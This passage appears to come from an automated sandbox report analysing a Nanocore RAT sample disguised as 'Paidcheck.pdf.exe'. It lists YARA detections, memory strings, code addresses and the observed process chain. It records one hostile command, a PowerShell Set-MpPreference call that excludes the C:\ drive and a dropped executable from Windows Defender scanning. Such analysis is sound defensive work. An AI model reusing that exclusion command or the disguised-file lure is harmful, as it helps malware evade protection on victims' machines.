Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmp; String found in binary or memory: https://go.micro
Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: RegAsm.exe, 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp; Binary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      Yara detected Nanocore RAT
      Source: Yara match | File source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Initial sample is a PE file and has a suspicious name
      Source: initial sample | Static PE information: Filename: Paidcheck.pdf.exe
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_006A29C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_00E5C204
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_00E5E5C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_00E5E5D0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF963C
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF00FB
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_06FF012D
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_0733FC48
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_07B28180
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe | Code function: 0_2_006A2050
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_00763DFE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_065402B0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_029BE480
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_029BE471
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_029BBBD4
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_05096550
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509CFB0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_05093E30
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509C398
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_05094A50
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509D06E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_05094B08
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509BA27
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_0509D2E8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC9C90
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CCA5F0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC2D10
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC1818
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC276E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC24EE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC2430
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CCE27A
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC9910
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_06CC4921
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 10_2_070507D8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 17_2_00CA3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 19_2_002A3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 21_2_008A3DFE
      Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303465052.0000000003FEB000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameQjisrzmpsmlj.dll" vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303229105.000000000739C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318898900.0000000007290000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.305879453.0000000002C21000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameIureehicuwdmdjhbahb.dllH vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe | Binary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Section loaded: sfc.dll
      Source: Paidcheck.pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
